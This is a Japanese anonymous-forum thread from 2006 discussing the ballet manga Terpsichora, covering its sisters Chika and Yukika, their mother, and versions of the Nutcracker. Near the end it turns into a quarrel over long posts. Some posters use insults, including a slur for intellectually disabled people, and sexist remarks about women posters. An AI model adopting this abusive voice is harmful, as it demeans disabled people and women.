89 :85:2006/08/12(土) 15:48:48 ID:EEn6kFkX0
>尻馬
今着たばかりだから、順番はしょうがないでしょ。
私は、簡潔に書けばいいのにと思っただけだ。

90 :名無しんぼ@お腹いっぱい:2006/08/12(土) 16:06:35 ID:eMi98LM40
漫画板の他のスレから帰って来ると、
(ここ数十レスは特に)女特有の粘着質が感じられてちょっと浮いてる。
少女漫画板に来ちゃったような。
それを腐女子臭とでも言うのだろうか。

91 :名無しんぼ@お腹いっぱい:2006/08/12(土) 16:21:48 ID:EEn6kFkX0
>腐女子臭
人格攻撃とはこのテのものを言うのではないのか?
文章そのものでなく、存在を否定する。
って、自分はマンガ読んでるだけで同人関係ないけどw

自分もウザイから消えるw

92 :名無しんぼ@お腹いっぱい:2006/08/12(土) 16:26:57 ID:eMi98LM40
腐女子臭は言いすぎだったかもね。
でも確かにこの荒れ方って女子特有ってカンジするよ。
まあ、ギシスレだからしょうがないけどw

93 :名無しんぼ@お腹いっぱい:2006/08/12(土) 16:30:56 ID:k4X0CKjkO
>>84-85のタイミングならどんな言い訳も通用しないと思うぞw

94 :85:2006/08/12(土) 16:40:25 ID:EEn6kFkX0
>>93
曲解したければ勝手にどうぞ、というしかないわな。

95 :名無しんぼ@お腹いっぱい:2006/08/12(土) 17:00:03 ID:FBmqbicJ0
なんかプチループな解釈を得意気に披露する
ミエミエちゃんぽい人が・・・。
正直>>85に同意だな。
でも、わたしも千花の性格って、
千恵子(と六花)で全部説明がつくと思うよ。
バレエ頑張ってたのも、高潔な良い子だったのも、
勝ち負けにこだわる性格だったのも、
千恵子に一番に必要とされる為に
千恵子の期待にそおうとして
千恵子の価値観で生きてきたからだと思う。
毛箱みたいのは千恵子の価値観では負けだったんでは。
どうして命捨てるまで千恵子価値観にそったのかは、
六花と年子のうえ千恵子が先生で無償の愛情を
得られた期間が短すぎて・・・とか
以前色々書いたことあるから止めとくけど。
だからキチガイだとは思わない。

あと、「鬼子母神」以外にも
テレプシの元ネタはたくさんありそう。
「アラベスク」は言うに及ばず、
「木花佐久夜毘売」の姉妹関係とか、
「処天」の厩戸と来目兄弟の母が
間人媛じゃなくて額田部女王だった場合とか、
別の関係性から見ればもっと増える。

96 :名無しんぼ@お腹いっぱい:2006/08/12(土) 18:03:13 ID:r7a926aa0
まあ千恵子の価値観で生きてきていたとしても
これから自立して自分のバレエを踊れる子だった。それだけの実力はあった。
実際クララを踊ってる千花を見て、千恵子は「あんなふうに踊れるなんて」
と言ってなかったっけ?
あの公演をさかいに、飛躍的に表現力が伸びたんじゃないかという予感がある。

なのにあの怪我が。ってことだよね。
本当運が悪いとしかいえない。

97 :名無しんぼ@お腹いっぱい:2006/08/12(土) 18:13:17 ID:1Tj7IRGl0
>>96
>実際クララを踊ってる千花を見て、千恵子は「あんなふうに踊れるなんて」
>と言ってなかったっけ?
残念だが六花と間違えているのではないかと。

98 :名無しんぼ@お腹いっぱい:2006/08/12(土) 18:47:03 ID:J0D1PZqu0
千花でもそういう場面はあったよ。

99 :名無しんぼ@お腹いっぱい:2006/08/12(土) 18:48:58 ID:Hcr8WtfY0
ID真っ赤な人はキモイ必死の法則

100 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:13:37 ID:1Tj7IRGl0
>>98
あった?
「気が入ってる」ならあったけど。

101 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:14:13 ID:FBmqbicJ0
>>96
>あの公演をさかいに、飛躍的に表現力が伸びたんじゃ
あのまま怪我せずに無事に育ったとしたら、
貝塚でプリマになれなかった敗北感を晴らすという
千恵子の望みを叶えるために存在してた千花だから、
貝塚でプリマというのが終着点だった気もする。
千恵子の価値観にない六花の振り付けを踏み台にすれば
もっと上に行けたかもしれないけど。
姉妹で力を合わせれば・・・て、
ハトシェプストの止血姉妹みたいな共依存関係だけど。

102 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:18:32 ID:FBmqbicJ0
金子先生が言ってたんだよね。
「冷静すぎるくらいの千花ちゃんが
あんな風にクララを踊ろうとは!」て。

103 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:23:17 ID:WgzWrQTU0
>96-97
金子先生が千花ちゃんに対して思っていたけど>あんなふうに踊る

104 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:25:09 ID:WgzWrQTU0
>102
ごめん、かぶった。

105 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:37:40 ID:AGBL51Jc0
千恵子が妊娠
三女ながら一花を産む

106 :名無しんぼ@お腹いっぱい:2006/08/12(土) 19:38:15 ID:1Tj7IRGl0
>102
「冷静すぎるくらいの千花ちゃんが」「熱でもあるんじゃないかと心配なくらい」
「あんな風に(気が入った)クララを踊ろうとは」でしょ。
気が入った=表現力と解釈していいのかな。
六花の時みたいに「踊りが歌っているというか…」くらい
言われれば表現力があるんだな、と思えるんだけど。

107 :名無しんぼ@お腹いっぱい:2006/08/12(土) 20:05:43 ID:k4X0CKjkO
千恵子じゃないやん

108 :名無しんぼ@お腹いっぱい:2006/08/12(土) 20:09:22 ID:J0D1PZqu0
千恵子も混じってる

109 :名無しんぼ@お腹いっぱい:2006/08/12(土) 21:16:34 ID:FBmqbicJ0
>>106
千花は六花の表現力からくる振り付けを借りて初めて、
千恵子価値観の娘を超えて成熟できる存在になり、
千花+六花振り付け+熱の入った、という状態になって
借り物のはずの六花の表現力を
我が物にしたかのように光輝いたけど、
本来の器を超えた力を振るったツケのように怪我したのでは。
千花は六花の表現力を踏み台として借りれないと、
あの熱の入った表現力を備えたクララにはなれず、
本来の千花の力だけでは、冷静すぎて表現力いまいちの、
千恵子の価値観を結晶させた娘以上には成長できなかった。
結局その怪我は、六花を表に出す為の機会になってしまって、
踏み台を踏み直す機会すら失った千花は
生理はあっても成熟できなかった。
すんごく意地悪な想像だけど。

110 :名無しんぼ@お腹いっぱい:2006/08/12(土) 21:37:12 ID:vXhh6esSO
意地悪つうかこじつけぽくないかな
踏み台云々のこと言ったら、富樫のブラックボックスや、鳥山の過緊張、毎度の金子の助言と言い、ユキだっていろんな人の力を借りてクララを踊ったのだし
ユキもチカもいろんな人から、手助けやアドバイスがあってクララをこなした(チカは怪我しちゃったけど)
アーシャの言う踏み台と同じ程度の意味で、借り物とはちょっと違う気がする
だから本来の器以上のことをしたから〜とかもよく分からない
そこまでいくと、個人の思想とか宗教ぽい流れを感じてしまったので

111 :96:2006/08/12(土) 22:36:40 ID:r7a926aa0
すまん。離れていた。訂正とフォローサンクスでした。

112 :名無しんぼ@お腹いっぱい:2006/08/13(日) 01:29:33 ID:vhAHFpFB0
六花のブラックボックスや過緊張は、踊り手の能力として副次的なもので、
表現力と同列に語れないと思う。
それでも六花は技術面でずば抜けてない弱みがあるけどね。
千花の表現力が、くるみ割りで飛躍的に伸びたとも思わない。
あれはあくまでの六花の発想を借りたもので、千花が生み出したものでもないし、
その後表現力をモノにしたような描写もない。
ただ本番でいつもより生き生きと気の入った踊りができたことが
その後何かを掴むきっかけとなる可能性はあったのかもしれない。
まあ>>109のキャパを超えた踊りをしたプラスとマイナス
という解釈も面白い。

113 :名無しんぼ@お腹いっぱい:2006/08/13(日) 02:30:18 ID:vhAHFpFB0
>>70
「周囲や状況から強いられてやらされたことでも、やりながら
好きになることはあるし、立派なモチベーションがなくとも、
才能があればいい結果を生み出せる」と思っていたけど、
貝塚の発表会の頃の場面で、千花が思いのほか、
母親の期待にこだわっていたことに意外感をおぼえたことを思い出したよ。

千花のパーソナリティは、母親似であろうとやはり千花個人の資質。
それが母親の期待に沿う個性であることと、もしかすると母親の期待に沿う
優等生であることに存在意義を見出したことで千恵子色は強かったとはいえ。
最初は親べったりのあり方であっても、やがてそれに葛藤をおぼえて
独自性も出していく(親のあり方を全否定するとは限らない)ことが
ある前に、飛び降りてしまったorz

分野によっては、人の評価を得るべくという姿勢が強いと
小物止まりになる。褒められる答案を書くように頑張って手っ取り早く
優等生になれるものの本当に優れたものを考えたり生み出したりする能力が
育たないようなの。バレエのように身体能力の比重が高いとそうでもないか。

114 :名無しんぼ@お腹いっぱい:2006/08/13(日) 03:07:40 ID:l/LS5teMO
さっき9巻読んでて、富樫のモノローグの
「六花には何かが足りない あの子の意識を根本から変える何かが」
ってのが気になった。
千花の死によって、六花がその何かを獲得するんだろうか。
そう考えると千花が六花の成長の犠牲になったみたいで、ちょっと鬱だけど。

115 :62:2006/08/13(日) 03:49:46 ID:t0rQndHd0
あれ?私のせいで板が荒れたかしら?
うん、気のせいだね。スンマセンー(TT)


>>72
>チカは、思いやりや優しさも持ってる子だよ
これは本当にそう思う。
2巻の始めで食事の準備中に「二重関節」の話で
六花ちゃんが絶望して泣き出したときに
千花ちゃんも一緒に泣いちゃってるもん。
他人の痛みがわかる、優しい人間だよ千花ちゃんは。


>>74
「母親が悪い」とは一言も言ってないよー!
他人のせいにしても何にもならんよー。
だいたい、その論理じゃ、さくらパパも亀田パパもアニマル浜口も
みんな悪人になっちゃうよー(泣)


116 :名無しんぼ@お腹いっぱい:2006/08/13(日) 04:09:13 ID:PONbGsjSO
大丈夫大丈夫!蛇比礼の扉絵でおっきしたってドンマイドンマイ!むしろポジティブシンキング!

117 :62:2006/08/13(日) 04:26:44 ID:t0rQndHd0
千花ちゃんは千恵子のロボットなのでは?
疑問に思い至ったのは4巻終盤での
千花ちゃんが初めて壁にぶつかった練習シーン。

鳥山「やってみろ」
千花ちゃん タタター

五嶋「千花ちゃん演技下手」
鳥山曰く「だけど珍しいタイプだよね〜冷静というか冷めてるというか」


千花ちゃん本質的な大ピンチなんだけど
ここで六花ちゃん大活躍!
六花ちゃんの価値観を千花ちゃんに注入することによって
千花ちゃんは千恵子の呪縛からの、解放への一歩を踏み出すことが出来た
のではないかしらん?

しかし、電車のホームで
「お願いセリフ作って六花ちゃん。あれなら私踊れるかもしれない。」
と切実に頼む千花ちゃんを見ると
千花ちゃんは、メンタル面では、実は相当に脆弱だたのでは?
という思いを禁じえない。


118 :62:2006/08/13(日) 05:22:50 ID:t0rQndHd0
それにしても、六花ちゃんはなんてラッキーなんだろうと思う。
ソケット問題の宣告で、だんだんネガティブになって
一度辞めちゃうんだけど、これが幸運の始まりだったのね。
六花ちゃん自身で「リタイアする」決断したことを、千恵子に了承される。
後に千花ちゃんが同じことをやろうとしたとき
痛恨の「逃げよ」発言で千恵子が千花ちゃんを逃がさなかったの時とは
あまりに対照的。

六花ちゃんは、この時点で千恵子の鎖からの逃避に一度成功しちゃったのね。
(元々、千花ちゃんバリアーで千恵子の呪縛が弱かったのも幸い)
んで逃避したはいいけど、その後迷走する六花ちゃんの前に
タイミングよく登場したのが千恵子には無い価値観を持つ金子先生。

六花ちゃんは金子先生の導きによりミナクルプロセスを邁進して行くんだけど
ここで印象的なのがバナナのシーン。
3巻初頭で、一睡も出来なかったアホな六花ちゃんに
千恵子が体力をつけさせようと無理やりオニギリを食べさせようとするんだけど
六花ちゃん必死に防御w
そこに登場したのがカネコ仕込の奇跡のバナナ、その名も冷凍バナナ!
六花ちゃんはバナナを平らげ
その後に、千恵子の提供したオニギリを食べている。
この
金子>>>千恵子
の逆順序は象徴的だと思った。


119 :名無しんぼ@お腹いっぱい:2006/08/13(日) 08:37:52 ID:2Bh/L7TKO
バレエにしろ、フィギュアにしろ、技術だけでもすごいのに、その上、表現力まで求められるて、改めていろんな才能を持ち合わせないといけないんだね〜
絵も描けてストーリーを作れる漫画家と同じくらいすごいと思う
何かみんな難しい単語がたくさん出てるのに幼稚な文でスマソ

120 :名無しんぼ@お腹いっぱい:2006/08/13(日) 08:47:04 ID:5BAIQ5U30
しかもメンタルの強さと運も必要だしね……。
フィギュアは競技なぶんだけ、ある意味もっとシビアだよ〜
メダリストでもない限りプロ転向しても契約金はそう高くならないし。
技術と表現力はあっても怪我やタイミングの悪さに
泣いた選手がどれだけ居たことか。

121 :名無しんぼ@お腹いっぱい:2006/08/13(日) 09:17:45 ID:2Bh/L7TKO
そういや、メンタル面も強くないとダメなんだよね
これってひょっとするといちばん要求されるものの中で難易度高いかも…
確かにフィギュアや新体操とかあんな大観衆の前で、演技できるだけでも並の肝っ玉じゃできないよなあ、ていつも見るたび恐れ入る
駿みたいに注目されてなんぼ、ていう性格も才能のうちだよね(天才でーす、て書いてあったし)
チカはメンタル面はバレコンのときから強かったけど、もともと上がらないタイプかつ、やるだけのことをやった、てことからくる自信もあるからなのかな
ユキは勝ち負けにはこだわらないけど、他人の評価が気になるタイプ(金子先生談)だから失敗したらどうしよう、て不安で緊張する
もともと我も弱いタイプだし、目立ちたがりやでもないユキみたいな子は場数を踏むことによって慣れていく感じなんだろうか
チカは私が私が、ていう自己主張が強いタイプなわけではないけど、我は強い子=千恵子さん だったね

122 :名無しんぼ@お腹いっぱい:2006/08/13(日) 10:55:41 ID:0wIG4E2C0
>>110
富樫鳥山金子の手助けというのは、
すでに自立したものが、してないものに与える手助けで、
自分の将来性まで相手の養分に捧げるような
重いものではない気もする。(金子はちょっと微妙だけど)
でも、六花の場合、千花が怪我しなかったら
千花を輝かせるためだけに才能を使って、
自分自身は表舞台に立てなかった気がするんだよね。
六花はアーシャほどもしっかりしてなかったし、
まじで踏み台だけで終わってたかも。
あの千花クララも、振り付け込みで千花の手柄になってたし、
真相を知ってるのは、千花と六花と金子だけ。
でも、どうしてあそこでギシ先生は、
千花クララの振り付けに限って六花の手柄だと
ちゃんとに周囲に知らせるような展開にして、
六花があの振り付けで報われるようにしなかったのかなと。
ひょっとしてあそこで千花ちゃんに得させたままなのは、
あれが怪我の代償になってる所為で、
反対に六花はあそこで損した代償に、
表舞台に出ることが出来たという話なのかなーと。
まあ、こじつけだけど。
あと千花クララの演技は六花からの借り物だと思うよ。

123 :名無しんぼ@お腹いっぱい:2006/08/13(日) 11:04:12 ID:0wIG4E2C0
>>114
千花の死は六花の成長の犠牲だけど、
千花が怪我するまでは、
六花が千花の成長の犠牲になってた気がする。

124 :名無しんぼ@お腹いっぱい:2006/08/13(日) 11:38:42 ID:5eclqgkZ0
>122
千花の怪我はアクシデントに対して
型どおりの振る舞いしかとれない融通のきかなさに
舞台を成功させるという責任感の強さが
裏目に出たんだと思ったよ。
クララの演技も六花からの助言とはいえ
借り物どまりにならず千花らしい努力の甲斐あって
自分のものにはしてたんじゃないかな。
六花自身はクララの演技を考えるのは遊び感覚で
千花に感謝されることが喜びだったみたいだから
代償って考えが出るのは意外。

125 :名無しんぼ@お腹いっぱい:2006/08/13(日) 11:56:51 ID:vhAHFpFB0
>>121
六花は、自信がなくて他人の目を気にする所はあるけれど、
生き方自体は、親や周囲の評価を気にするタイプではないと思う。
自分のやりたい世界を求める所がある。
踊っている時も、本当に調子がよくなると、
むしろ無我の境地になっているしね。

126 :名無しんぼ@お腹いっぱい:2006/08/13(日) 12:00:42 ID:vhAHFpFB0
>>125に語弊があるといけないので、付け加えると、
六花の生き方が周囲の評価を気にするものでないと言ったのは、
誰かから評価を得たり誰かより上に位置したりすることを
がモチベーションになるのではなく、
やりたいことが自然に湧き上がってくる所があるという意味で。


127 :名無しんぼ@お腹いっぱい:2006/08/13(日) 12:43:08 ID:vhAHFpFB0
六花は、改善されつつあるとはいえ現時点ではメンタルが一大ネック。
やじきたの狭霧のように、感受性の強さという長所と表裏一体の弱さと、
甘いちゃんさと、小さい頃からの引け目とで。
でも、我が強くないのが幸いして我に振り回されずに対応でき、
案外と逆風に対する立て直しが効く面もある。
今の所本番に強いし、あとバレエ以外の場面でも、
普段は甘ちゃんだけど、こうと思った時が押しが強いw

千花は、基本的にメンタルが強い。
スワニルダの失敗の後も立て直していたし、
努力に裏打ちされた自信もあるだろうし、
責任感が強くて気丈な子。自分の非も背負える強さもある所が立派。
だけど、勝ち負けにこだわり自分が優秀であらねばという
思いにが先行する子にありがちな、無理や立て直しのきかなさや
狭さもある。

それぞれの長短かな?
日頃は千花が断然しっかりしていて、
でもマニュアル外の事態では、六花はエエー!と乱れつつも、
日頃の弱気なしがらみから解き放たれて、持てる良さを発揮するかんじ。

128 :名無しんぼ@お腹いっぱい:2006/08/13(日) 15:31:49 ID:l/LS5teMO
>>123
確かに六花は犠牲にはなってたかもしれないけど
悪い言い方になるが、姉の死を(結果的にしろ)糧にしての成長って受け取れちゃうんだよね

富樫のあのモノローグから、六花が千花の死を乗り越えたり受容したりするのではなくて
吸収するという印象を受ける。
六花にとって千花の死は不幸だけれど、同時に幸でもある。
六花自身がそれを自覚したときがちょっと怖い気もするけど、
さすがにそこまでは描かないかな。

129 :名無しんぼ@お腹いっぱい:2006/08/13(日) 16:03:49 ID:+yBkpz8C0
チカちゃんは精神力が強いけど失敗が重なってるんだよなぁ。
バレコンで踏み外し、クララで転倒して怪我、練習中イタリアンで再び怪我、
その辺りから周りの言葉(医者のいう事)や片足で立つのを恐れ始めてる。
さすがに強いチカちゃんもマイナスモード入るよね。

追い討ちで靭帯伸びきり→再手術して膝に屑、大借金の上にさらに手術って。・゚・(ノД`)・゚・。

130 :名無しんぼ@お腹いっぱい:2006/08/13(日) 16:07:16 ID:iS/gykHSO
チカ派かユキ派かによって見方が変わるんだな。

派と言ったら大袈裟かな?
でもお互いに影響しあってるのを犠牲とか糧とか吸収とか
それはそういう見方も出来るけど物語のネガティブな側面しか捉えてないと思う。

「言葉悪いけど」とか付けてるからわざとそういう見方をしてるんだと思うけど。

131 :名無しんぼ@お腹いっぱい:2006/08/13(日) 16:30:10 ID:hlP/9LU40
いまさらだけど、最後の舞台なら、チカには最後まで躍らせてあげたかった。
小夜子になってしまうか?(swan)

132 :名無しんぼ@お腹いっぱい:2006/08/13(日) 17:00:25 ID:bTM+x8Tw0
クララは最強なのやっぱ千花ちゃんかな。六花の演技指導に千花のテクニックが
一つになって最高だった、おまけに美人すぎたし。千花もあの時は生理なんてものともせず乗りのりだったし
バックに月は出るしですごかった。

でも実際に観にいくなら茜ちゃんがみたいな。3回転とかみたかった。
関係ないけど大地くんて他の人の演技みて「よーしボクもがんばるぞ」って
シーンが多いね。千花に六花にタクト。出番がないわりには。

133 :名無しんぼ@お腹いっぱい:2006/08/13(日) 17:01:06 ID:l/LS5teMO
>>130
キャラとしては両方に好感持ってるからなぁ、どっち派とも。
自分次女なんで、六花には共感するところが多いけれど。

まあ、ネガティブな考え方であることは認めるよ。
千花が生きている間は、影響しあってバランスが取れてて良かったとは思ってたんだけどさ。

134 :名無しんぼ@お腹いっぱい:2006/08/13(日) 17:38:05 ID:vhAHFpFB0
>>132
水樹とか>最強

135 :名無しんぼ@お腹いっぱい:2006/08/13(日) 17:48:58 ID:kjEq3rDi0
>>132
バレエ詳しくないけど茜ちゃんが3回転のところ、
チカちゃんは4回転振付けられて、成功させてなかった?

でも茜ちゃんは顔こそアレだけどwいい子だと思う
繊細な演技は出来ないけど、向上心も度胸も基礎もある

136 :名無しんぼ@お腹いっぱい:2006/08/13(日) 18:37:37 ID:0wIG4E2C0
>>128
わたし六花と千花の関係って、
植物の生存競争を連想するんだよね。
植物は日光が当たらないと成長できないから、
我先にと争うように高く成長しようとするけど、
日陰で伸びれなかった植物は下手すると枯死。
六花より先に芽吹いた千花の場合、ただ真直ぐ日光目指して
あらゆる栄養をより高く伸びるために使って成長。
で後から芽吹いた六花は、
千花の日陰になってなかなか成長できない。
でもなんとか生き延びようと根っ子を一生懸命張って
地面からの栄養で育っていた。
嵐のときなんかには千花の陰だと楽なんだけど。
するとある日偶然千花の木が事故で傾いたので、
六花は日光を浴びることが出来てここぞとばかり
急成長をし始めた。
でも傾いた木の方はなかなか回復できず虫にも付かれて
さらに伸びた六花の木に日光を遮られて枯死してしまった。
六花は枯死した千花を肥やしに・・・とこんな感じ。

六花が自分で千花の死を糧にしてると悩むという展開、
わたしはぜひ見たいよ。やらなかったらガッカリかも。
ちなみに自分は、空美派兼金子派。

137 :名無しんぼ@お腹いっぱい:2006/08/13(日) 18:39:04 ID:0wIG4E2C0
>>124
怪我したときの千花の事情はその通りだと思う。
私はギシ先生の物語の組み立て方を分解してみたい、
というか色々こじつけて遊んでるだけだから。
でも千花の演技が六花の借り物なのは譲れないと思う。
千花は鳥山からクララの演技指導されてたけど駄目だった。
多分茜も駄目だったはず。でも水樹ちゃんは
自分の個性でクララを演技して作り上げてたのでは。
それがその人本来の才能なんだと思う。
でも千花は六花から才能を借りてしまった。
おかげで六花は自分のクララを千花クララにそっくりだと
差し引かれて評価されてるし、結果的にクララでは
本来の才能に比べて千花が得して、六花が損してる。
>千花に感謝されることが喜び
それで満足できてしまうのが危ういところなんだと思うな。
自分が輝けないから、輝く人をさらに輝かす為に献身してる。
でも反対から見れば、辛くても矢面に立って
自らを鍛え磨き成長させようとしない状態だし、
輝いてる人を甘やかすことで共依存関係になってるともいえる。
金子もそういうところがあるけど、
六花なんてまで発展途上なのに。

138 :名無しんぼ@お腹いっぱい:2006/08/13(日) 18:57:31 ID:Mqtx6QMr0
なんかここ少女マンガ板みたいになってるな。
とりあえず数字コテ消えれ。
少女マンガ板へ帰れ。

139 :名無しんぼ@お腹いっぱい:2006/08/13(日) 19:11:24 ID:hlnpwM+E0
3行以上書く人は少女漫画板に帰れ。

140 :名無しんぼ@お腹いっぱい:2006/08/13(日) 19:44:27 ID:0wIG4E2C0
>>125-126
六花のそういう特性って、千花との関係で育まれた気がする。
六花が生まれたときから目の前には常に
あの鉄壁のオールマイティ優等生・千花がいたわけで、
現実世界ではどうしても劣等感から抜け出せないので、
空想世界に居場所を見出したんだと思う。
もともと負けることへの諦めが性格の根幹になってるから、
闘争心がいまいち欠けてる。
でもおかげで人間関係は姉妹関係も含めて平和。

141 :名無しんぼ@お腹いっぱい:2006/08/13(日) 20:18:52 ID:t0rQndHd0
>>129
>チカちゃんは〜失敗が重なってるんだよなぁ。
全部、千花ちゃんに責任が無いところがまた惨い・・・


>>131
途中退場したことは、後々に尾を引きずってると思う。
もしクララを最後まで踊れたら、千恵子も満足して
その後の千花の人生を縛り付けるたずなをゆるめてたと思う。。

>>140
なるほどなあ。六花ちゃんの人格形成ってそうやって説明されると
納得できるなあ。
ただし、二人とも「いい子」であることが前提だけどw


142 :名無しんぼ@お腹いっぱい:2006/08/13(日) 20:37:38 ID:2Bh/L7TKO
話、豚切りごめん
今日ね、図書館でパリオペラ座のくるみのビデオ見てきたの
そのくるみは、クララ(ユキと同じ髪型に感動w)と金平糖の精が同じ人がやってたんだけど、気づかなかったけど、そういうバージョンの方が多いのかな
テレプシのくるみのイメージしか知らなかったから、振り付けとかも何かエロくて意外だったんだけどw
クララ=金平糖の精、同一人物にするとお話自体まで、ちょっとエロつか少女の性の目覚め?(書いてて恥ずかしい…)みたいなものも内包してるように思えて…
こういう見方てあり?単に私が変態?
よかったら教えてエロくない人

143 :名無しんぼ@お腹いっぱい:2006/08/13(日) 20:45:31 ID:2Bh/L7TKO
ちなみに、くるみを見たのは、今日が初めて
気づかなかった、てのはクララと金平糖が同じ人がやってることに最後でやっと分かった、て言いたかったんだけど
お恥ずかしい話だけど
でもそのクララ役の人(名前もちゃんと見てない…orz)、クララのときは本当に少女っぽくて、金平糖のときとの化けっぷりが毛箱並だったもんで

144 :名無しんぼ@お腹いっぱい:2006/08/13(日) 21:18:48 ID:8pk3DKYp0
エロイのはパリオペだからでないすか。

松山とかはクララも金平糖も同じ人(って森下さん…)が踊るよね、
クララじゃなくマーシャと呼ぶけど。

145 :名無しんぼ@お腹いっぱい:2006/08/13(日) 22:03:46 ID:2Bh/L7TKO
レスありがとう
パリオペラ座だからなのかもなんだw
くるみ、まだ何本かあったので、またいろいろ見て、にわかくるみ研究してみます

146 :名無しんぼ@お腹いっぱい:2006/08/14(月) 00:03:12 ID:1YmGsud/0
>>136
片方だけが栄え、片方は日陰者になる蓋然性はないんだけどね。
両方とも栄えることだってありうる。
千花ちゃんは、母親の期待に沿う資質を持っていて、
そしてバレエを習う上で恵まれた環境の下、小さい頃から立派な
踊り手になるべく努力してきた。小さい頃からそういう自覚がかなりあった。
六花ちゃんはスロースターター。
ソケットの問題があったり弱点も抱えているけれど、
ルードラからお呼びがかかるだけの資質、懐疑的だった鳥山も認める
存在感や金子の言っていた音感の良さがある。
こういうのを並べてみると、劣等感からの逃避の産物というよりは
持って生まれた感性という気がする。
千花ちゃん、六花ちゃんそれぞれの良さ、弱みがあるから面白い。

147 :名無しんぼ@お腹いっぱい:2006/08/14(月) 01:03:32 ID:99jThpvW0
流れに関係ないけど
>>118 に冷凍バナナの事が書いてあったから言うけど
冷凍バナナはお腹を冷やしすぎるからああいう場面には向かないのよね。
絵では一本食べているように見えるけど、
あれを真似する人いたら、せいぜい1/4本くらいに留めて置かないと
肝心な時お腹痛くて…って事になるよ。

148 :名無しんぼ@お腹いっぱい:2006/08/14(月) 01:25:35 ID:UzwBVWSM0
またババァどもが大量にどうでもいいチャット始めてるな
どうして少女漫画板からこっちへきちまったんだろ

149 :名無しんぼ@お腹いっぱい:2006/08/14(月) 01:27:52 ID:wRWKQ1Tf0
>>143
大きく分けると
(1)クララと金平糖の精は役の上でも別人(金平糖はいわばお菓子の国の女主人)
(2)マーシャ(またはクララ)が金平糖の精に姿を変える
の二つのパターンがあって、更に(2)には、
(a)クララと金平糖を同じバレリーナが通して踊る版と
(b)別のバレリーナが踊る場合(金平糖の方がずっと格上)
とがあります〜。

150 :名無しんぼ@お腹いっぱい:2006/08/14(月) 02:20:14 ID:9CwHfxWdO
ええと、初心者質問で悪い。
自分、漫画板も少女漫画板もたまにしか覗かないんだけれども、
どういう住み分けしてるの?
過去スレ流れてるんでいまいち把握できなくて。
少女漫画板の方は流れが早く脱線が多い感じだったので、
ゆっくり作品語るならこっちかなと思ったんだけど。
>3行以上〜
ということはここは雑談メインなのか?
それとも単純に女読者メインと男読者メインってことなんでしょうか。

151 :名無しんぼ@お腹いっぱい:2006/08/14(月) 02:57:39 ID:bsRaOOLt0
少女漫画板のスレは、匿名性に隠れて煽り合いが多いので、
(このスレの争いなんてもんじゃねーw)
IDが出たほうがいいのでは、と有志がこちらの漫画板にスレを立てました。
ID否定派は従来通り少女漫画板に立てたので、結果的に二派になりました。
現在、少女漫画板はテレプシ中心、こちらは総合という了解になっています。
両方見ている自分としては、合流したほうがスッキリするとは思うけどね?

152 :名無しんぼ@お腹いっぱい:2006/08/14(月) 02:57:44 ID:wRWKQ1Tf0
>>150
3行以上云々ってのは単なる嫌味だと思う(やけに長文レスが続いたから)。
ゆっくり作品語るのがこっち、というのであってると思います。

153 :名無しんぼ@お腹いっぱい:2006/08/14(月) 09:42:52 ID:0pYhsHbq0
5〜6行ならちゃんと読むけど、10行以上だと面倒になるよ、私は。
もう少しまとめて、とか思ってしまう。

154 :名無しんぼ@お腹いっぱい:2006/08/14(月) 09:58:25 ID:E2HNzUJ00
既に他人が書いてる(しかも長文で)ことをいちいち長文で書き直してる人が多過ぎ。
しかも本編読めばわかることばかり。
夏休みの水増し読書感想文じゃあるまいし、
そういうのは少女漫画板のスレでやってくれ

155 :名無しんぼ@お腹いっぱい:2006/08/14(月) 11:40:59 ID:iotyk8b30
マジで、人に読ませることを意識して推敲・まとめをやってほしい。
自分だけ気持ちよくなってんじゃねえと思う>長文野郎

156 :名無しんぼ@お腹いっぱい:2006/08/14(月) 11:44:41 ID:lrV5Ro5j0
さあギシギシしてまいりました・・・w
いろんな人がいるんだから、
気に入ったレスだけ読んであとはスルーで良いじゃん。

長文の応酬って、新鮮で面白いよ。
じっくり作品の話がしたいから、このスレ続いて欲しいと思ってたし。
あと既に他人が書いてると言っても、
過去レスの内容なんてちゃんと覚えてるの無理。
私なんて、自分のレスすら忘れてそうだよ。
作品読めばわかるったって、現にこんだけ意見が違うし、
そこが面白くてわざわざ他人のレス読みにきてるわけで。
あとはなるようになるのでは。

157 :名無しんぼ@お腹いっぱい:2006/08/14(月) 12:18:57 ID:E2HNzUJ00
>>156
1つ2つ前のレスをまた書き直してるようなレスばっかりじゃないか。
長文野郎は全然他人のレス読んでない。いい加減にしていただきたい。
俺解釈を聞けー!ってだけなら自分のブログででもやってくれ。

158 :名無しんぼ@お腹いっぱい:2006/08/14(月) 12:33:28 ID:9b4hkAjk0
他人のレスに文句が出るのは今だけじゃないの。
休載中は見に来る人もレスも減っちゃうだろうし。



159 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:18:32 ID:UzwBVWSM0
>>156
>過去レスの内容なんてちゃんと覚えてるの無理。
>私なんて、自分のレスすら忘れてそうだよ。

こんな池沼が人に読ませる気のないオナニー長文を
スレをティッシュ代わりに書き込みを繰り返してるんだな。
でその末期が少女漫画板と。

160 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:21:10 ID:1yENGCRM0
汚い煽りの言葉よりもティッシュの方がましだよ。ID:UzwBVWSM0


161 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:23:11 ID:8NbYCDVB0
>159に深く感じ入りました

162 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:30:03 ID:5ip3gL/p0
>>159
同意


>>156とかはたまに自分のレス読み返してみたらどうかな。

163 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:34:02 ID:lrV5Ro5j0
オナニーとかババアとか池沼とか
レッテル貼りだ大好きなのか。
まるで少女漫画板スレの嵐ちゃんみたい。

164 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:47:17 ID:jrBo+ZU90
とりあえず長文は少女マンガ板でやって欲しい。マジで。

165 :名無しんぼ@お腹いっぱい:2006/08/14(月) 14:55:21 ID:UzwBVWSM0
長文でも人に読ませる気がわかるのと、
ただ書き殴りたいだけのとは違いは一目瞭然。
前スレなんていい長文書き込みや考察が結構あったよ。
「人に読ませる」これを意識しろって言ってんだよ。
ただ書きたいだけならチラシの裏かblogでやれ。

166 :名無しんぼ@お腹いっぱい:2006/08/14(月) 17:54:19 ID:EVxHVKyv0
>>163
